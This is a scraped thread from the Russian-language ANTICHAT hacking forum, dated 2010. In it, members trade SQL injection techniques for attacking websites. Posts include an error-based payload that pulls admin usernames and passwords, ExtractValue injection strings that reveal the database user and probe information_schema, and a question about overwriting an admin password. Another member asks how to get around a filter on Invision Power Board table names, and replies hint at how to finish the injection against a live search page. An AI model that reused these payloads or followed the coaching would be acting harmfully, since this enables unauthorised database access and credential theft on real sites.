HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14181  
Старый 03.07.2010, 14:44
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Iggy  
Iggy said:
load_file()?!
Si tacuisses, philosophus mansisses (Boetius)
 
Ответить с цитированием

  #14182  
Старый 03.07.2010, 15:50
Rabben
Новичок
Регистрация: 27.03.2009
Сообщений: 11
Провел на форуме:
39049

Репутация: 1
По умолчанию

Имеется запрос:

Код:
Code:
(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,username,password)+from+admins+limit+0,1),floor(rand(0)*2))+from+admins+group+by+2)a)--+
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.
 
Ответить с цитированием

  #14183  
Старый 03.07.2010, 16:10
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

Цитата:
Сообщение от Rabben  
Rabben said:
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.
имеешь ввиду "update admins set password=......" ?

насколько я знаю, комбинировать запросы select и update нельзя
 
Ответить с цитированием

  #14184  
Старый 03.07.2010, 16:18
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607

Репутация: 19
По умолчанию

помогите, как правильно сделать запрос ?

site.com/search/?search=1&search_words=j&search_section_id=25'&sea rch_cond=1&search_numrows=10

DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326
 
Ответить с цитированием

  #14185  
Старый 03.07.2010, 16:22
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Rabben  
Rabben said:
Имеется запрос:
Код:
Code:
(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,username,password)+from+admins+limit+0,1),floor(rand(0)*2))+from+admins+group+by+2)a)--+
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.
если бы можно было запросом из браузера изменять значения в БД, то я думаю % похеканных сайтов стал намного больше, и раздел рашифровка хешей не нужен был бы совсем...
 
Ответить с цитированием

  #14186  
Старый 03.07.2010, 16:24
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Cybersteger  
Cybersteger said:
помогите, как правильно сделать запрос ?
site.com/search/?search=1&search_words=j&search_section_id=25'&sea rch_cond=1&search_numrows=10
DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326
да что же такое? откуда вы все нарисовались с такими умными вопросами? почитай-ка клац
 
Ответить с цитированием

  #14187  
Старый 03.07.2010, 16:39
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607

Репутация: 19
По умолчанию

мда чел .. я это читал и нераз, помогало, но не в этом случае, я хз как здесь делать, комментарием после WHERE (ti.parent_id=2 order by 1/* OR ti.tr_id=2 order by 1/*) (-- ,+--+,#...) нелзя закрыть, а в пидзапросах полохо понимаю потому и запостив мб кто-то знает (мне кажется здесь должен быть пидзапрос).
 
Ответить с цитированием

  #14188  
Старый 03.07.2010, 17:27
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

Тебе нужен примерно такой результат: WHERE (ti.parent_id=2) order by 1/*

Подсказка есть - пробуй.
 
Ответить с цитированием

  #14189  
Старый 03.07.2010, 19:18
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607

Репутация: 19
По умолчанию

ага ) (site.com/search/?search=1&search_words=jjh&search_section_id=99999 99)+and+ExtractValue(1,concat(0x5c,(user())))--)

MySQL Error : XPATH syntax error: '\user@127.0.0.2'

только теперь непонятно, версия 5.1.41 , а infromation_schema будто нет что это?

site.com/search/?search=1&search_words=jjh&search_section_id=99999 99)+and+ExtractValue(1,concat(0x5c,(select+schema_ name+from+infromation_schema.schemata+limit+1,1)))--

MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata'

.....ExtractValue(1,concat(0x5c,(select+schema_nam e+from+infromation_schedasdma.schemata+limit+1,1)) )--

MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata' --одинаково потому и думаю что infromation_schema нет
 
Ответить с цитированием

  #14190  
Старый 03.07.2010, 19:24
#Wolf#
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424

Репутация: 479
По умолчанию

вобщем есть запрос на выборку из таблы ibf_members

символ "_"(в имени таблицы) заменяется на "ampersand#95;"

и только в тех случаях, когда в строке(имя таблицы) есть "ibf_".

в остальных случаях "_" проходит.

Есть мысли? И как возможно это обойти?

Спасибо.

//пробовал с помощью подзапроса - не вышло.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ